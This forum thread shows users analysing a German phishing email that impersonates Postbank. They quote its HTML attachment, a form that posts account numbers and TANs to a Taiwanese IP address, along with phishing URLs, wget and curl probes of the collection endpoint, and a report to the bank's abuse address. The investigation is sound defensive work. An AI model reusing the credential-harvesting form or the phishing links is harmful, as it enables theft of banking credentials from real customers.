First Bank Account html form bamboozlement

[Karl Godt]

Today I firstly managed to isolate a fraud.html attachment,
that Firefox addon Simple Mail fetched from my remote inbox .

It is written in an almost worst German.

I get such fraud mails approx. once a week with only one or two spelling or grammar errors
with an already dead link to somewhere
http://coomar.milchs.org/KhaaPjMSgcRLYz ... IWFAc.html

and here is a (still valid) one :
http://babilon.arptoday.org/wWMrsTng/ym ... 2poVk.html


But this one has an tan.html attachment with following lines :
[ .. ]

Code: Select all

<div id="main"><div id="main-cn"><div id="nav"><div id="nav-cn">
<a href="#content" class="skip">Navigation berspringen</a>
<div id="nav-global" class="nav">
<h2 class="aux">Navigation</h2>
<ul><li class="ng-account-overview">
<a href="?wicket:bookmarkablePage=:de.postbank.ucp.application.rai.fs.kontenuebersicht.FinanzstatusPage" class="state-current">Kontenbersicht</a></li></ul></div></div></div>
    <form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
      <div id="content">
        <div id="content-cn">
          <div id="div9">
            <div id="div" class="tpl-05">
              <div id="div2">
                <div id="div3">
                  <div id="div4">
                    <div id="div5">
                      <div id="div6">
                        <div id="content-bd">
                          <div class="tab-panel-bd">
                            <div id="id3d7">
                              <div class="form frm-western-union">
                                <div>
                                  <div class="frm-freigeben control-step" id="id45a">
                                    <div id="id460">
                                      <div class="form-ft ft-legitimacy">
                                        <fieldset>
                                          <div class="legend"><h3>Postbank Online-Banking - Willkommen</h3></div>
                                          <div class="legitimacy">
                                          <div class="legitimacy-cn">
                                            <div class="legitimacy-hd"></div>
                                            <div id="id464">
                                              <div class="inputBlock">
                                                <div id="id46d">

                                                  <div class="legitimacy-bd" id="id478">
                                                    <p><strong>Bitte lesen Sie sorgfältig und füllen Sie alle Schritte in Form aufgeführt, so können wir erfolgreich überprüfen Sie Ihr Profil.</strong></p>
                                                    <div class="field fld-text fld-mobile-tan" id="id479">
                                                      <div class="field-cn" id="id492">
                                                        <div class="field-bd"> <span class="field-group"> <span class="field-label">
                                                          <label for="mobile-tan"> <b>Kontonummer:</b> </label>
                                                          </span></span></div>

[ .. ]
                                    <wicket:container id="id46e" style="display:none"></wicket:container>
                                  </div>
                                </div>
                              </div></div></div></div></div></div></div></div></div></div></div></div></div></form>

wget http://163.17.12.7/postdone.php gave me these outputs :

Code: Select all

bash-3.00# wget http://163.17.12.7/postdone.php
--16:41:26--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:28--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00# wget --no-check-certificate http://163.17.12.7/postdone.php
--16:41:50--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:51--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for postbank.de: unable to get local issuer certificate
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.postbank.de/ [following]
--16:41:53--  https://www.postbank.de/
           => `index.html'
Resolving www.postbank.de... 160.83.4.4
Connecting to www.postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for www.postbank.de: unable to get local issuer certificate
WARNING: certificate common name `postbank.de' doesn't match requested host name `www.postbank.de'.
HTTP request sent, awaiting response... 200 OK
Length: 103,127 (101K) [text/html]

100%[====================================>] 103,127      170.98K/s             

16:41:54 (170.60 KB/s) - `index.html' saved [103127/103127]

bash-3.00# 

[L18L]

wget http://163.17.12.7/postdone.php gave me these outputs

Code: Select all

# wget http://163.17.12.7/postdone.php 
--2014-01-30 20:02:52--  http://163.17.12.7/postdone.php
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://postbank.de [following]
--2014-01-30 20:02:53--  https://postbank.de/
Resolving postbank.de (postbank.de)... 160.83.4.4
Connecting to postbank.de (postbank.de)|160.83.4.4|:443... connected.
ERROR: cannot verify postbank.de's certificate, issued by `/C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=Terms of use at https://www.verisign.com/rpa (c)06/CN=VeriSign Class 3 Extended Validation SSL SGC CA':
  Unable to locally verify the issuer's authority.
To connect to postbank.de insecurely, use `--no-check-certificate'.
# 

different maybe because this was from Fatdog?


EDIT: wget version 1.13

[Karl Godt]

bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters . Have had YouTube session that reached my 5GB full speed limit, now am throttled ..


bash-3.00# host http://163.17.12.7
Host http://163.17.12.7 not found: 3(NXDOMAIN)

bash-3.00# host 163.17.12.7
7.12.17.163.in-addr.arpa domain name pointer E-7.iem.cyut.edu.tw.

And googling for E-7.iem.cyut.edu.tw :

Browse ftp://E-7.iem.cyut.edu.tw - FileMare.com
filemare.com/browse/E-7.iem.cyut.edu.tw‎Diese Seite übersetzen
Browse ftp://E-7.iem.cyut.edu.tw: PORT1. ... ftp://E-7.iem.cyut.edu.tw. also known as ftp://163.17.12.7. » Asia » Taiwan » T'ai-pei » Taipei. affiliate marketing.

And
bash-3.00# wget ftp://163.17.12.7/postdone.php
--22:09:17-- ftp://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:21... failed: Connection timed out.
Retrying.

...

http://www.hcidata.info/host2ip.cgi
also says

Details of 163.17.12.7
IP Address : 163.17.12.7
Location : Taiwan (95% accuracy)
Host Name : E-7.iem.cyut.edu.tw

What the hell is there in Tai-Wan ?


And wget now also further directs to

Code: Select all

bash-3.00# wget http://163.17.12.7/postdone.php
--22:15:28--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--22:15:31--  https://postbank.de/
           => `index.html.1'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.

AND curl seems somehow at least download something :

Code: Select all

bash-3.00# curl --post301 --post302 http://163.17.12.7/postdone.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>302 Found</TITLE> </HEAD><BODY><H1>Found</H1>The document has moved <A HREF="https://postbank.de">here</A>.<P><HR><ADDRESS>Apache/1.3.23 Server at localhost Port 80</ADDRESS></BODY></HTML>bash-3.00#

[L18L]

bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters

You are right. I had overseen that you have posted 2 commands (without and with --no-check-certificate)

The connection goes to Deutsche Bank's postbank via edu.tw.
....and edu.tw has one of your tans (if your knowledge of German language was as bad as the language used in that mail )

You could ask Deutsche Bank to not accept redirects from tw.

[Karl Godt]

bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters

You are right. I had overseen that you have posted 2 commands (without and with --no-check-certificate)

The connection goes to Deutsche Bank's postbank via edu.tw.
....and edu.tw has one of your tans (if your knowledge of German language was as bad as the language used in that mail )

You could ask Deutsche Bank to not accept redirects from tw.

I have send an mail about that to missbrauch @ post bank de and got a standard response, that their folks would investigate .

Deutsche Bank is a private commercial bank, that has nothing to do with german federal reserve Deutsche Bundesbank - just same as the danish Den Danske Bank .

Post Bank is the bank branch of the formerly state-owned German Mail.